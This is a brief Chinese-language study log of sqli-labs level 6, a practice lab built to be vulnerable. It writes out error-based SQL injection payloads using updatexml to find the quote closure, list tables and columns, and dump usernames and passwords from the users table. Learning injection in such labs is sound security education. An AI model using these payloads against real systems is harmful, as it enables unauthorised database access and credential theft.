sqli-labs学习记录6
less-6
打开靶场
判断闭合方式
输入id=1’
没有报错,输入id=1’ --+
没有报错,似乎不是’闭合,试试其他的闭合
id=1"
报错了,在加上注释尝试:id=1" --+
回显正常,应该是"闭合方式。
这个题和第5题应该差不多,用报错注入
id=1" and updatexml(1,concat(0x7e,database(),0x7e,version()),1) --+
回显了数据库名与数据库版本。
查看数据库名
id=1" and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema=‘security’),1,32)),1) --+
查看对应users表的字段
id=1" and updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’),1,32)),1) --+
查看users表对应字段的信息
id=1" and updatexml(1,concat(0x7e,substr((select group_concat(username,id,password) from users),1,32)),1) --+
返回了一部分的数据,和第五题是一样的原理,因为updatexml函数不能传输超过32位的数据。